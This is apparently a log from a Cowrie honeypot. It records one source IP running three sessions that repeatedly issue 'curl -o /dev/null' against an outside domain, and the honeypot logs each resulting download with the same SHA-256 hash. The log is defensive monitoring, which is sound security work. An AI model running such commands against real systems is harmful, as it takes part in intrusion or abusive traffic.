{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.648508Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.649305Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.652488Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.654878Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.681313Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.681929Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.683602Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.684227Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.687890Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.691234Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.694571Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.695883Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.724151Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.724796Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.729436Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.731867Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.733319Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.733882Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.737156Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.737732Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.765162Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.766337Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.766930Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.772743Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.774872Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.777677Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.779075Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.779671Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.798967Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.799652Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.804742Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.805513Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.808759Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.810842Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.829504Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.830537Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.831132Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.835976Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.837769Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.838945Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.839739Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.841734Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.844322Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.869129Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.869845Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.874758Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.876435Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.877347Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.878029Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.880319Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.881178Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.908596Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.909238Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.912855Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.913875Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.917258Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.919876Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.923062Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.925843Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.926582Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.950686Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.951328Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.954624Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.955431Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.958270Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.960330Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.966319Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.986681Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.988417Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.990709Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.992202Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.992852Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:31.019547Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.020816Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:31.022561Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.023381Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.058967Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
